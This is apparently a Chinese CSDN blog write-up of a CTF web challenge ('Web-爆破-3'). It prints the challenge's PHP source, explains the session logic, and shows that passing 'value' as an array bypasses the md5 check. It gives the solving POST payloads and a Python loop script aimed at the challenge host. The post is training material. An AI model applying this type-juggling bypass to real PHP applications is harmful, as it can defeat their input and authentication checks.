“百度杯” CTF比赛 九月场 Web-爆破-3

最新推荐文章于 2021-03-04 16:54:29 发布
最新推荐文章于 2021-03-04 16:54:29 发布
阅读量280 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34106499/article/details/104003521
版权

访问题目链接,获得源码

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
	$_SESSION['nums'] = 0;
	$_SESSION['time'] = time();
	$_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
	session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
	$_SESSION['nums']++;
	$_SESSION['whoami'] = $str_rands;
	echo $str_rands;
}

if($_SESSION['nums']>=10){
	echo $flag;
}

show_source(__FILE__);
?>

代码审计

  • session_start();:启动session会话,session是以数组文本形式存储在服务器端的会话,不接受客户端修改,相对于cookie较安全。启动后一般可以在系统临时文件夹sess_PHPSESSID找到session文件,该位置可通过php.ini文件下session.save_path属性进行查询和设置。一般文件名形如sess_4c83638b3b0dbf65583181c2f89168ec,后面问32位编码的随机字符串,抓包后查看请求头PHPSESSID可知。

  • if(!isset($_SESSION['nums'])){}:创建名为nums的变量,创建成功后执行if内语句:变量nums=0; time=time(); whoami=ea;

  • if($_SESSION['time']+120<time()){}:如果启动session的时间+120秒小于目前时间,销毁会话。简而言之,创建的会话有效期为2分钟。也可通过session_set_cookie_params()设置session的生存期,该函数需要在session_start()调用之前调用。如未设置session生存周期,则在客户端关闭浏览器时自动注销。

  • $value = $_REQUEST['value'];:获取value的值赋值给value,通过get,post,cookie均可获取。

  • $str_rand = range('a', 'z');:创建一个包含a-z的数组变量$str_rand

  • $str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];:从$str_rand数组中随机选择两个字符组成字符串赋值给$str_rands

  • if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){}

  • if($_SESSION['nums']>=10){}:如果session数组中变量nums>=10,则可输出flag

解题思路

  1. session变量nums>=10时即可输出flag,且nums每通过一次if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){}判断即可加1。

  2. 变量value可控制,等于随机字符串whoami即可,第一次为’ea’,之后whoami的随机值都会返回。且md5(数组)=0,可通过使value为数组绕过。

  3. 需要在两分钟内重复以上过程10次以上即可拿到flag。

方法

1. 手工循环

两分钟内重复10次一般网速都可以达到,payload如下(post提交):

value[]=ea
value[]=py
value[]=pp
value[]=ga
value[]=yl
value[]=wr
value[]=bc
value[]=zf
value[]=db
value[]=ry

即可过得flag。

2. python脚本循环

本人python渣渣,附上脚本:

import requests
url = "http://d105df0bf53543faa484f07eee12fc6724021af7cff34d58.changame.ichunqiu.com/?value[]="
url2 = url + 'ea'
s = requests.session()
for i in range(11):
	r = s.get(url2)
	url2 = url+r.content[0:2]
	if 'flag{' in r.content:
    	print(r.content)

================================================================

小白成长记,大佬请指点。
xnudhi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
CTFshow-web入门-爆破
qq_63575829的博客
04-18 348
CTFshow-web入门-爆破
CTF-Web-这个真的是爆破
qq_41459661的博客
03-04 311
这个真的是爆破 源码分析 <?php error_reporting(0); session_start(); require('./flag.php'); // 初始化$_SESSION['nums']、$_SESSION['time']、$_SESSION['whoami'],isset函数是检测变量是否设置 if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SES
CTFshow-web入门爆破(21-28)
i_kei的博客
12-13 6583
web21 用burp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了,接下来构造payload 分别选中账户名和密码,我这里选择把冒号放到了账户名那里,放到密码也可以,只是一会儿加前缀和后缀的区别 payload1(账户名):先导入题目提供的字典,然后加后缀冒号,再用base64加密 payload2(密码):导入提供的字典,base64加密 payload1和payload2都需要取消勾选 构造完之后,发现需要爆破的条目数太大了,经过群里大佬
i春秋-web-爆破3
Sea_Sand息禅
01-16 512
首先,是PHP代码审计,看懂就能解出来题。 &lt;?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'...
PHP设置SESSION时间
vodepan的博客
12-15 5899
if(isset($_SESSION['expiretime'])) {          if($_SESSION['expiretime']  time()) {              unset($_SESSION['expiretime']);              header('Location: logout.php?TIMEOUT'); // 登出     
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
[百度-二月](Misc-Web)爆破-3
weixin_33894992的博客
06-23 84
<?phperror_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){$_SESSION['nums']=0;$_SESSION['time']=time();$_SESSION['whoami']='ea';}if($_SESSION['time']+...
百度” 2017 二月 Misc Web 爆破-1
wyj_1216 House
04-15 250
题目 i春秋CTF题库 flag就在某六位变量中 writeup 知识点 $$ php中 $ 是可以叠加使用的 $$a = ${${a}} = ${b} = "Hello world!" 例如 : $a = "b"; $b = "Hello world!"; echo $$a; 就可以打印出 b 的值 “Hello world!” 超全局变量 $GLOBALS — 引用全局作用域中可用的全部...
i春秋的一道题目我提交了不下10遍,flag都出来了,交上去愣是不对。。。。到第十几遍的时候才提示正确,想不通
include_heqile的博客
09-18 1225
(╯‵□′)╯︵┴─┴
CTF中PHP常见漏洞及利用(未完待续)
qq_34106499的博客
01-25 4905
总结ctf中出现的php漏洞及利用
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1437
1. mysql盲注及脚本编写 2. .git泄露
i春秋 第二届春秋欢乐赛 Web-Hello World
qq_34106499的博客
01-20 1227
1. git源码泄露问题 2. 了解git源码泄露的原理及其漏洞利用 3. 待进一步掌握。。。
2020年春秋新春战“疫”网络安全公益赛——盲注
qq_34106499的博客
03-04 705
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
百度CTF比赛 2017 二月爆破-1(10分)
qq_34106499的博客
01-14 582
1. 文件包含的利用:include()函数; 2. $_REQUEST函数的使用; 3. 正则匹配的使用:pre_match()函数; 4. eval()函数的利用; 5. 全局变量$GLOBALS的利用;
百度CTF比赛 十月 Web-Hash
qq_34106499的博客
01-21 568
1. 细心查看源码 2. MD5加密与解密 3. PHP中序列化与反序列化的应用 4. 反序列化中正则表达式与强制文件名限制的绕过 5. base64加密与解密 6. eval函数中执行php源码的漏洞利用 7. eval函数中执行系统命令时绕过addslash函数
福建闽盾 ctf比赛题目
最新发布
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值